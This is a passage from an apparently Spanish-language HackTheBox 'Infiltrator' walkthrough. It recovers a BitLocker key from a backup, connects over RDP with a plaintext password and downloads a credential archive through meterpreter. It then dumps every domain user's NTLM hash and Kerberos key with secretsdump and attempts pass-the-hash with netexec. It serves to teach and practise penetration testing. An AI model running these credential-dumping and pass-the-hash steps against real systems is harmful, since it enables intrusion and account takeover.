Igor Pavlov : 2024-11-29 </span></span><span class="line"><span class="cl"> 64-bit <span class="nv">locale</span><span class="o">=</span>en_US.UTF-8 Threads:128 OPEN_MAX:1024, ASM </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">Scanning the drive <span class="k">for</span> archives: </span></span><span class="line"><span class="cl"><span class="m">1</span> file, <span class="m">209327</span> bytes <span class="o">(</span><span class="m">205</span> KiB<span class="o">)</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">Extracting archive: BitLocker-backup<span class="o">(</span>1<span class="o">)</span>.7z </span></span><span class="line"><span class="cl">-- </span></span><span class="line"><span class="cl"><span class="nv">Path</span> <span class="o">=</span> BitLocker-backup<span class="o">(</span>1<span class="o">)</span>.7z </span></span><span class="line"><span class="cl"><span class="nv">Type</span> <span class="o">=</span> 7z </span></span><span class="line"><span class="cl">Physical <span class="nv">Size</span> <span class="o">=</span> <span class="m">209327</span> </span></span><span class="line"><span class="cl">Headers <span class="nv">Size</span> <span class="o">=</span> <span class="m">271</span> </span></span><span class="line"><span class="cl"><span class="nv">Method</span> <span class="o">=</span> LZMA2:20 7zAES </span></span><span class="line"><span class="cl"><span class="nv">Solid</span> <span class="o">=</span> - </span></span><span class="line"><span class="cl"><span class="nv">Blocks</span> <span class="o">=</span> <span class="m">1</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">Enter password <span class="o">(</span>will not be echoed<span class="o">)</span>: </span></span><span class="line"><span class="cl">Everything is Ok </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">Folders: <span class="m">1</span> </span></span><span class="line"><span class="cl">Files: <span class="m">1</span> </span></span><span class="line"><span class="cl">Size: <span class="m">792371</span> </span></span><span class="line"><span class="cl">Compressed: <span class="m">209327</span> </span></span><span class="line"><span class="cl">❯ </span></span><span class="line"><span class="cl">❯ ls </span></span><span class="line"><span class="cl"> BitLocker-backup  7zhash  BitLocker-backup<span class="o">(</span>1<span class="o">)</span>.7z  BitLocker-backup.7z  network_capture_2024.pcapng </span></span><span class="line"><span class="cl">❯ ll BitLocker-backup </span></span><span class="line"><span class="cl">.rw-rw-r-- kali kali <span class="m">774</span> KB Tue Feb <span class="m">20</span> 07:51:45 <span class="m">2024</span>  <span class="s1">&#39;Microsoft account _ Clés de récupération BitLocker.html&#39;</span> </span></span><span class="line"><span class="cl">❯ </span></span></code></pre></td></tr></table> </div> </div><p>Con la traduccion del contenido se lee claves de recuperacion para BitLocker.</p> <p><img src="https://sckull.github.io/images/posts/htb/infiltrator/2025_20221265856.png" alt="image"></p> <table> <thead> <tr> <th>Name of the device</th> <th>ID of the key</th> <th>Recovery key</th> </tr> </thead> <tbody> <tr> <td>Managment-PC</td> <td>0K0UD2A8</td> <td>650540-413611-429792-307362-466070-397617-148445-087043</td> </tr> </tbody> </table> <h1 id="bitlocker-access">BitLocker Access</h1> <p>Anteriormente encontramos credenciales que permiten el acceso a O.martinez por RDP, utilizamos estas con <code>xfreerdp3</code>.</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">xfreerdp3 /u:O.martinez /v:10.10.11.31 /d:infiltrator.htb /p:<span class="s1">&#39;M@rtinez_P@ssw0rd!&#39;</span> /cert:ignore </span></span></code></pre></td></tr></table> </div> </div><p>Tras lograr una sesion RDP identificamos un disco duro cifrado con Bitlocker.</p> <p><img src="https://sckull.github.io/images/posts/htb/infiltrator/2025_20223281129.png" alt="image"></p> <p>Ingresamos la clave de recuperacion que encontramos en el backup, esto nos permitio el acceso.</p> <p><img src="https://sckull.github.io/images/posts/htb/infiltrator/2025_20223281324.png" alt="image"></p> <p>Dentro del disco duro encontramos un unico archivo que sugiere un backup de credenciales.</p> <p><img src="https://sckull.github.io/images/posts/htb/infiltrator/2025_20223281441.png" alt="image"></p> <p>Realizamos la copia de este backup y lo descargamos.</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">meterpreter &gt; dir </span></span><span class="line"><span class="cl">Listing: C:<span class="se">\u</span>sers<span class="se">\o</span>.martinez<span class="se">\d</span>ocuments </span></span><span class="line"><span class="cl"><span class="o">======================================</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">Mode Size Type Last modified Name </span></span><span class="line"><span class="cl">---- ---- ---- ------------- ---- </span></span><span class="line"><span class="cl">100666/rw-rw-rw- <span class="m">2055137</span> fil 2024-02-25 09:23:02 -0500 Backup_Credentials.7z </span></span><span class="line"><span class="cl">040777/rwxrwxrwx <span class="m">0</span> dir 2024-02-19 20:44:35 -0500 My Music </span></span><span class="line"><span class="cl">040777/rwxrwxrwx <span class="m">0</span> dir 2024-02-19 20:44:35 -0500 My Pictures </span></span><span class="line"><span class="cl">040777/rwxrwxrwx <span class="m">0</span> dir 2024-02-19 20:44:35 -0500 My Videos </span></span><span class="line"><span class="cl">100666/rw-rw-rw- <span class="m">402</span> fil 2024-08-23 11:07:14 -0400 desktop.ini </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">meterpreter &gt; download Backup_Credentials.7z </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> Downloading: Backup_Credentials.7z -&gt; /home/kali/htb/infiltrator/Backup_Credentials.7z </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> Downloaded 1.00 MiB of 1.96 MiB <span class="o">(</span>51.02%<span class="o">)</span>: Backup_Credentials.7z -&gt; /home/kali/htb/infiltrator/Backup_Credentials.7z </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> Downloaded 1.96 MiB of 1.96 MiB <span class="o">(</span>100.0%<span class="o">)</span>: Backup_Credentials.7z -&gt; /home/kali/htb/infiltrator/Backup_Credentials.7z </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> Completed : Backup_Credentials.7z -&gt; /home/kali/htb/infiltrator/Backup_Credentials.7z </span></span><span class="line"><span class="cl">meterpreter &gt; </span></span></code></pre></td></tr></table> </div> </div><h2 id="ntdsdit-backup">NTDS.dit Backup</h2> <p><code>7z</code> muestra que es un backup del archivo <code>ntds.dit</code> junto con <code>SECURITY</code> y <code>SAM</code>.</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span><span class="lnt">21 </span><span class="lnt">22 </span><span class="lnt">23 </span><span class="lnt">24 </span><span class="lnt">25 </span><span class="lnt">26 </span><span class="lnt">27 </span><span class="lnt">28 </span><span class="lnt">29 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">❯ 7z l Backup_Credentials.7z </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">7-Zip 24.09 <span class="o">(</span>x64<span class="o">)</span> : Copyright <span class="o">(</span>c<span class="o">)</span> 1999-2024 Igor Pavlov : 2024-11-29 </span></span><span class="line"><span class="cl"> 64-bit <span class="nv">locale</span><span class="o">=</span>en_US.UTF-8 Threads:128 OPEN_MAX:1024, ASM </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">Scanning the drive <span class="k">for</span> archives: </span></span><span class="line"><span class="cl"><span class="m">1</span> file, <span class="m">2055137</span> bytes <span class="o">(</span><span class="m">2007</span> KiB<span class="o">)</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">Listing archive: Backup_Credentials.7z </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">-- </span></span><span class="line"><span class="cl"><span class="nv">Path</span> <span class="o">=</span> Backup_Credentials.7z </span></span><span class="line"><span class="cl"><span class="nv">Type</span> <span class="o">=</span> 7z </span></span><span class="line"><span class="cl">Physical <span class="nv">Size</span> <span class="o">=</span> <span class="m">2055137</span> </span></span><span class="line"><span class="cl">Headers <span class="nv">Size</span> <span class="o">=</span> <span class="m">250</span> </span></span><span class="line"><span class="cl"><span class="nv">Method</span> <span class="o">=</span> LZMA2:24 </span></span><span class="line"><span class="cl"><span class="nv">Solid</span> <span class="o">=</span> + </span></span><span class="line"><span class="cl"><span class="nv">Blocks</span> <span class="o">=</span> <span class="m">1</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> Date Time Attr Size Compressed Name </span></span><span class="line"><span class="cl">------------------- ----- ------------ ------------ ------------------------ </span></span><span class="line"><span class="cl">2024-02-25 10:12:32 D.... <span class="m">0</span> <span class="m">0</span> Active Directory </span></span><span class="line"><span class="cl">2024-02-25 10:12:34 D.... <span class="m">0</span> <span class="m">0</span> registry </span></span><span class="line"><span class="cl">2024-02-25 10:12:34 ....A <span class="m">35667968</span> <span class="m">2054887</span> Active Directory/ntds.dit </span></span><span class="line"><span class="cl">2024-02-25 10:00:07 ....A <span class="m">262144</span> registry/SECURITY </span></span><span class="line"><span class="cl">2024-02-25 10:00:07 ....A <span class="m">12582912</span> registry/SYSTEM </span></span><span class="line"><span class="cl">------------------- ----- ------------ ------------ ------------------------ </span></span><span class="line"><span class="cl">2024-02-25 10:12:34 <span class="m">48513024</span> <span class="m">2054887</span> <span class="m">3</span> files, <span class="m">2</span> folders </span></span><span class="line"><span class="cl">❯ </span></span></code></pre></td></tr></table> </div> </div><p>Realizamos la extraccion de los archivos.</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span><span class="lnt">21 </span><span class="lnt">22 </span><span class="lnt">23 </span><span class="lnt">24 </span><span class="lnt">25 </span><span class="lnt">26 </span><span class="lnt">27 </span><span class="lnt">28 </span><span class="lnt">29 </span><span class="lnt">30 </span><span class="lnt">31 </span><span class="lnt">32 </span><span class="lnt">33 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">❯ 7z x Backup_Credentials.7z </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">7-Zip 24.09 <span class="o">(</span>x64<span class="o">)</span> : Copyright <span class="o">(</span>c<span class="o">)</span> 1999-2024 Igor Pavlov : 2024-11-29 </span></span><span class="line"><span class="cl"> 64-bit <span class="nv">locale</span><span class="o">=</span>en_US.UTF-8 Threads:128 OPEN_MAX:1024, ASM </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">Scanning the drive <span class="k">for</span> archives: </span></span><span class="line"><span class="cl"><span class="m">1</span> file, <span class="m">2055137</span> bytes <span class="o">(</span><span class="m">2007</span> KiB<span class="o">)</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">Extracting archive: Backup_Credentials.7z </span></span><span class="line"><span class="cl">-- </span></span><span class="line"><span class="cl"><span class="nv">Path</span> <span class="o">=</span> Backup_Credentials.7z </span></span><span class="line"><span class="cl"><span class="nv">Type</span> <span class="o">=</span> 7z </span></span><span class="line"><span class="cl">Physical <span class="nv">Size</span> <span class="o">=</span> <span class="m">2055137</span> </span></span><span class="line"><span class="cl">Headers <span class="nv">Size</span> <span class="o">=</span> <span class="m">250</span> </span></span><span class="line"><span class="cl"><span class="nv">Method</span> <span class="o">=</span> LZMA2:24 </span></span><span class="line"><span class="cl"><span class="nv">Solid</span> <span class="o">=</span> + </span></span><span class="line"><span class="cl"><span class="nv">Blocks</span> <span class="o">=</span> <span class="m">1</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">Everything is Ok </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">Folders: <span class="m">2</span> </span></span><span class="line"><span class="cl">Files: <span class="m">3</span> </span></span><span class="line"><span class="cl">Size: <span class="m">48513024</span> </span></span><span class="line"><span class="cl">Compressed: <span class="m">2055137</span> </span></span><span class="line"><span class="cl">❯ </span></span><span class="line"><span class="cl">❯ ll </span></span><span class="line"><span class="cl">drwxrwxr-x kali kali 4.0 KB Sun Feb <span class="m">25</span> 09:12:32 <span class="m">2024</span>  <span class="s1">&#39;Active Directory&#39;</span> </span></span><span class="line"><span class="cl"><span class="o">[</span>...<span class="o">]</span> </span></span><span class="line"><span class="cl">drwxrwxr-x kali kali 4.0 KB Sun Feb <span class="m">25</span> 09:12:34 <span class="m">2024</span>  registry </span></span><span class="line"><span class="cl"><span class="o">[</span>...<span class="o">]</span> </span></span><span class="line"><span class="cl">.rw-rw-r-- kali kali 2.0 MB Tue May <span class="m">27</span> 00:12:17 <span class="m">2025</span>  Backup_Credentials.7z </span></span><span class="line"><span class="cl"><span class="o">[</span>...<span class="o">]</span> </span></span><span class="line"><span class="cl">❯ </span></span></code></pre></td></tr></table> </div> </div><h2 id="ntds-secretsdump">NTDS secretsdump</h2> <p>Ejecutamos <code>secretsdump</code> especificando los archivos y de manera local. Nos muestra los hashes de todos los usuarios.</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span><span class="lnt">21 </span><span class="lnt">22 </span><span class="lnt">23 </span><span class="lnt">24 </span><span class="lnt">25 </span><span class="lnt">26 </span><span class="lnt">27 </span><span class="lnt">28 </span><span class="lnt">29 </span><span class="lnt">30 </span><span class="lnt">31 </span><span class="lnt">32 </span><span class="lnt">33 </span><span class="lnt">34 </span><span class="lnt">35 </span><span class="lnt">36 </span><span class="lnt">37 </span><span class="lnt">38 </span><span class="lnt">39 </span><span class="lnt">40 </span><span class="lnt">41 </span><span class="lnt">42 </span><span class="lnt">43 </span><span class="lnt">44 </span><span class="lnt">45 </span><span class="lnt">46 </span><span class="lnt">47 </span><span class="lnt">48 </span><span class="lnt">49 </span><span class="lnt">50 </span><span class="lnt">51 </span><span class="lnt">52 </span><span class="lnt">53 </span><span class="lnt">54 </span><span class="lnt">55 </span><span class="lnt">56 </span><span class="lnt">57 </span><span class="lnt">58 </span><span class="lnt">59 </span><span class="lnt">60 </span><span class="lnt">61 </span><span class="lnt">62 </span><span class="lnt">63 </span><span class="lnt">64 </span><span class="lnt">65 </span><span class="lnt">66 </span><span class="lnt">67 </span><span class="lnt">68 </span><span class="lnt">69 </span><span class="lnt">70 </span><span class="lnt">71 </span><span class="lnt">72 </span><span class="lnt">73 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">❯ secretsdump.py -system registry/SYSTEM -security registry/SECURITY -ntds <span class="s2">&#34;Active Directory&#34;</span>/ntds.dit LOCAL </span></span><span class="line"><span class="cl">Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> Target system bootKey: 0xd7e7d8797c1ccd58d95e4fb25cb7bdd4 </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> Dumping cached domain logon information <span class="o">(</span>domain/username:hash<span class="o">)</span> </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> Dumping LSA Secrets </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> <span class="nv">$MACHINE</span>.ACC </span></span><span class="line"><span class="cl"><span class="nv">$MACHINE</span>.ACC:plain_password_hex:4b90048ad6028aae98f66484009266d4efa571d48a8aa6b771d69d20aba16ddb7e0a0ffe9378a1ac7b31a812f0760fe2a8ce66ff6a0ff772155a29baa59b4407a95a920d0904cba6f8b19b6393f1551a476f991bbedaa66880e60611482a81b31b34c55c77d0e0d1792e3b18cdc9d39e0b776e7ef082399b096aaa2e8d93eb1f0340fd5f6e138da2580d1f581ff9426dce99a901a1bf88ad3f19a5bc4ce8ff17fdbb0a04bb29f13dc46177a6d8cd61bf91f8342e33b5362daecbb888df22ce467aa9f45a9dc69b03d116eeac89857d17f3f44f4abc34165b296a42b3b3ff5ab26401b5734fab6ad142d7882715927e45 </span></span><span class="line"><span class="cl"><span class="nv">$MACHINE</span>.ACC: aad3b435b51404eeaad3b435b51404ee:fe4767309896203c581b9fc3c5e23b00 </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> DefaultPassword </span></span><span class="line"><span class="cl"><span class="o">(</span>Unknown User<span class="o">)</span>:ROOT#123 </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> DPAPI_SYSTEM </span></span><span class="line"><span class="cl">dpapi_machinekey:0x81f5247051ff9535ad8299f0efd531ff3a5cb688 </span></span><span class="line"><span class="cl">dpapi_userkey:0x79d13d91a01f6c38437c526396febaf8c1bc6909 </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> NL<span class="nv">$KM</span> </span></span><span class="line"><span class="cl"> <span class="m">0000</span> 2E 8A EC D8 ED <span class="m">12</span> C6 ED <span class="m">26</span> 8E B0 9B DF DA <span class="m">42</span> B7 ........<span class="p">&amp;</span>.....B. </span></span><span class="line"><span class="cl"> <span class="m">0010</span> <span class="m">49</span> DA B0 <span class="m">07</span> <span class="m">05</span> EE EA <span class="m">07</span> <span class="m">05</span> <span class="m">02</span> <span class="m">04</span> 0E AD F7 <span class="m">13</span> C2 I............... </span></span><span class="line"><span class="cl"> <span class="m">0020</span> 6C 6D 8E <span class="m">19</span> 1A B0 <span class="m">51</span> <span class="m">41</span> 7C 7D <span class="m">73</span> 9E <span class="m">99</span> BA CD B1 lm....QA<span class="p">|</span><span class="o">}</span>s..... </span></span><span class="line"><span class="cl"> <span class="m">0030</span> B7 7A 3E 0F <span class="m">59</span> <span class="m">50</span> 1C AD 8F <span class="m">14</span> <span class="m">62</span> <span class="m">84</span> 3F AC A9 <span class="m">92</span> .z&gt;.YP....b.?... </span></span><span class="line"><span class="cl">NL<span class="nv">$KM</span>:2e8aecd8ed12c6ed268eb09bdfda42b749dab00705eeea070502040eadf713c26c6d8e191ab051417c7d739e99bacdb1b77a3e0f59501cad8f1462843faca992 </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> Dumping Domain Credentials <span class="o">(</span>domain<span class="se">\u</span>id:rid:lmhash:nthash<span class="o">)</span> </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> Searching <span class="k">for</span> pekList, be patient </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> PEK <span class="c1"># 0 found and decrypted: d27644ab3070f72ec264fcb413d75299</span> </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> Reading and decrypting hashes from Active Directory/ntds.dit </span></span><span class="line"><span class="cl">Administrator:500:aad3b435b51404eeaad3b435b51404ee:7bf62b9c45112ffdadb7b6b4b9299dd2::: </span></span><span class="line"><span class="cl">Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: </span></span><span class="line"><span class="cl">DC$:1001:aad3b435b51404eeaad3b435b51404ee:fe4767309896203c581b9fc3c5e23b00::: </span></span><span class="line"><span class="cl">krbtgt:502:aad3b435b51404eeaad3b435b51404ee:454fcbc37690c6e4628ab649e8e285a5::: </span></span><span class="line"><span class="cl">infiltrator.htb<span class="se">\w</span>inrm_svc:1104:aad3b435b51404eeaad3b435b51404ee:84287cd16341b91eb93a58456b73e30f::: </span></span><span class="line"><span class="cl">infiltrator.htb<span class="se">\l</span>an_managment:1105:aad3b435b51404eeaad3b435b51404ee:e8ade553d9b0cb1769f429d897c92931::: </span></span><span class="line"><span class="cl">infiltrator.htb<span class="se">\M</span>.harris:1106:aad3b435b51404eeaad3b435b51404ee:fc236589c448c620417b15597a3d3ca7::: </span></span><span class="line"><span class="cl">infiltrator.htb<span class="se">\D</span>.anderson:1107:aad3b435b51404eeaad3b435b51404ee:627a2cb0adc7ba12ea11174941b3da88::: </span></span><span class="line"><span class="cl">infiltrator.htb<span class="se">\L</span>.clark:1108:aad3b435b51404eeaad3b435b51404ee:627a2cb0adc7ba12ea11174941b3da88::: </span></span><span class="line"><span class="cl">infiltrator.htb<span class="se">\O</span>.martinez:1109:aad3b435b51404eeaad3b435b51404ee:eb86d7bcb30c8eac1bdcae5061e2dff4::: </span></span><span class="line"><span class="cl">infiltrator.htb<span class="se">\A</span>.walker:1110:aad3b435b51404eeaad3b435b51404ee:46389d8dfdfcf0cbe262a71f576e574b::: </span></span><span class="line"><span class="cl">infiltrator.htb<span class="se">\K</span>.turner:1111:aad3b435b51404eeaad3b435b51404ee:48bcd1cdc870c6285376a990c2604531::: </span></span><span class="line"><span class="cl">infiltrator.htb<span class="se">\E</span>.rodriguez:1112:aad3b435b51404eeaad3b435b51404ee:b1918c2ce6a62f4eee11c51b6e2e965a::: </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> Kerberos keys from Active Directory/ntds.dit </span></span><span class="line"><span class="cl">DC$:aes256-cts-hmac-sha1-96:09b3e08f549e92e0b16ed45f84b25cc6d0c147ff169ce059811a3ed9e6957176 </span></span><span class="line"><span class="cl">DC$:aes128-cts-hmac-sha1-96:d2a3d7c9ee6965b1e3cd710ed1ceed0f </span></span><span class="line"><span class="cl">DC$:des-cbc-md5:5eea34b3317aea91 </span></span><span class="line"><span class="cl">krbtgt:aes256-cts-hmac-sha1-96:f6e0a1bd3a180f83472cd2666b28de969442b7745545afb84bbeaa9397cb9b87 </span></span><span class="line"><span class="cl">krbtgt:aes128-cts-hmac-sha1-96:7874dff8138091d6c344381c9c758540 </span></span><span class="line"><span class="cl">krbtgt:des-cbc-md5:10bfc49ecd3b58d9 </span></span><span class="line"><span class="cl">infiltrator.htb<span class="se">\w</span>inrm_svc:aes256-cts-hmac-sha1-96:ae473ae7da59719ebeec93c93704636abb7ee7ff69678fdec129afe2fc1592c4 </span></span><span class="line"><span class="cl">infiltrator.htb<span class="se">\w</span>inrm_svc:aes128-cts-hmac-sha1-96:0faf5e0205d6f43ae37020f79f60606a </span></span><span class="line"><span class="cl">infiltrator.htb<span class="se">\w</span>inrm_svc:des-cbc-md5:7aba231386c2ecf8 </span></span><span class="line"><span class="cl">infiltrator.htb<span class="se">\l</span>an_managment:aes256-cts-hmac-sha1-96:6fcd2f66179b6b852bb3cc30f2ba353327924081c47d09bc5a9fafc623016e96 </span></span><span class="line"><span class="cl">infiltrator.htb<span class="se">\l</span>an_managment:aes128-cts-hmac-sha1-96:48f45b8eb2cbd8dbf578241ee369ddd9 </span></span><span class="line"><span class="cl">infiltrator.htb<span class="se">\l</span>an_managment:des-cbc-md5:31c83197ab944052 </span></span><span class="line"><span class="cl">infiltrator.htb<span class="se">\M</span>.harris:aes256-cts-hmac-sha1-96:20433af8bf6734568f112129c951ad87f750dddf092648c80816d5cb42ed0f49 </span></span><span class="line"><span class="cl">infiltrator.htb<span class="se">\M</span>.harris:aes128-cts-hmac-sha1-96:2ee0cd05c3fa205a92e6837ff212b7a0 </span></span><span class="line"><span class="cl">infiltrator.htb<span class="se">\M</span>.harris:des-cbc-md5:3ee3688376f2e5ce </span></span><span class="line"><span class="cl">infiltrator.htb<span class="se">\D</span>.anderson:aes256-cts-hmac-sha1-96:42447533e9f1c9871ddd2137def662980e677a748b5d184da910d3c4daeb403f </span></span><span class="line"><span class="cl">infiltrator.htb<span class="se">\D</span>.anderson:aes128-cts-hmac-sha1-96:021e189e743a78a991616821138e2e69 </span></span><span class="line"><span class="cl">infiltrator.htb<span class="se">\D</span>.anderson:des-cbc-md5:1529a829132a2345 </span></span><span class="line"><span class="cl">infiltrator.htb<span class="se">\L</span>.clark:aes256-cts-hmac-sha1-96:dddc0366b026b09ebf0ac3e7a7f190b491c4ee0d7976a4c3b324445485bf1bfc </span></span><span class="line"><span class="cl">infiltrator.htb<span class="se">\L</span>.clark:aes128-cts-hmac-sha1-96:5041c75e19de802e0f7614f57edc8983 </span></span><span class="line"><span class="cl">infiltrator.htb<span class="se">\L</span>.clark:des-cbc-md5:cd023d5d70e6aefd </span></span><span class="line"><span class="cl">infiltrator.htb<span class="se">\O</span>.martinez:aes256-cts-hmac-sha1-96:4d2d8951c7d6eba4edaf172fd0f7b78ab7260e3d513bf2ff387c70c85d912a2f </span></span><span class="line"><span class="cl">infiltrator.htb<span class="se">\O</span>.martinez:aes128-cts-hmac-sha1-96:33fdf738e13878a8101e3bf929a5a120 </span></span><span class="line"><span class="cl">infiltrator.htb<span class="se">\O</span>.martinez:des-cbc-md5:f80bc202755d2cfd </span></span><span class="line"><span class="cl">infiltrator.htb<span class="se">\A</span>.walker:aes256-cts-hmac-sha1-96:e26c97600c6f44990f18480087a685e0f1c71bcfbc8413dce6764ccf77df448a </span></span><span class="line"><span class="cl">infiltrator.htb<span class="se">\A</span>.walker:aes128-cts-hmac-sha1-96:768672b783131ed963b9deeac0a6d2e4 </span></span><span class="line"><span class="cl">infiltrator.htb<span class="se">\A</span>.walker:des-cbc-md5:a7e6cde06d6e153b </span></span><span class="line"><span class="cl">infiltrator.htb<span class="se">\K</span>.turner:aes256-cts-hmac-sha1-96:2c816a32b395f67df520bc734f7ea8e4df64a9610ffb3ef43e0e9df69b9df8b8 </span></span><span class="line"><span class="cl">infiltrator.htb<span class="se">\K</span>.turner:aes128-cts-hmac-sha1-96:b20f41c0d3b8fb6e1b793af4a835109b </span></span><span class="line"><span class="cl">infiltrator.htb<span class="se">\K</span>.turner:des-cbc-md5:4607b9eaec6838ba </span></span><span class="line"><span class="cl">infiltrator.htb<span class="se">\E</span>.rodriguez:aes256-cts-hmac-sha1-96:9114030dd2a57970530eda4ce0aa6b14f88f2be44f6d920de31eb6ee6f1587b5 </span></span><span class="line"><span class="cl">infiltrator.htb<span class="se">\E</span>.rodriguez:aes128-cts-hmac-sha1-96:ddd37cf706781414885f561c3b469d0c </span></span><span class="line"><span class="cl">infiltrator.htb<span class="se">\E</span>.rodriguez:des-cbc-md5:9d5bdaf2cd26165d </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> Cleaning up... </span></span><span class="line"><span class="cl">❯ </span></span></code></pre></td></tr></table> </div> </div><p>Intentamos utilizar el hash de administrator pero al ser un backup ha cambiado.</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">❯ netexec winrm 10.10.11.31 -u administrator -H 7bf62b9c45112ffdadb7b6b4b9299dd2 </span></span><span class="line"><span class="cl">WINRM 10.10.11.31 <span class="m">5985</span> DC01 <span class="o">[</span>*<span class="o">]</span> Windows <span class="m">10</span> / Server <span class="m">2019</span> Build <span class="m">17763</span> <span class="o">(</span>name:DC01<span class="o">)</span> <span class="o">(</span>domain:infiltrator.htb<span class="o">)</span> </span></span><span class="line"><span class="cl">WINRM 10.10.11.31 <span class="m">5985</span> DC01 <span class="o">[</span>-<span class="o">]</span> infiltrator.htb<span class="se">\a</span>dministrator:7bf62b9c45112ffdadb7b6b4b9299dd2 </span></span><span class="line"><span class="cl">❯ netexec rdp 10.10.11.31 -u administrator -H 7bf62b9c45112ffdadb7b6b4b9299dd2 </span></span><span class="line"><span class="cl">RDP 10.10.11.31 <span class="m">3389</span> DC01 <span class="o">[</span>*<span class="o">]</span> Windows <span class="m">10</span> or Windows Server <span 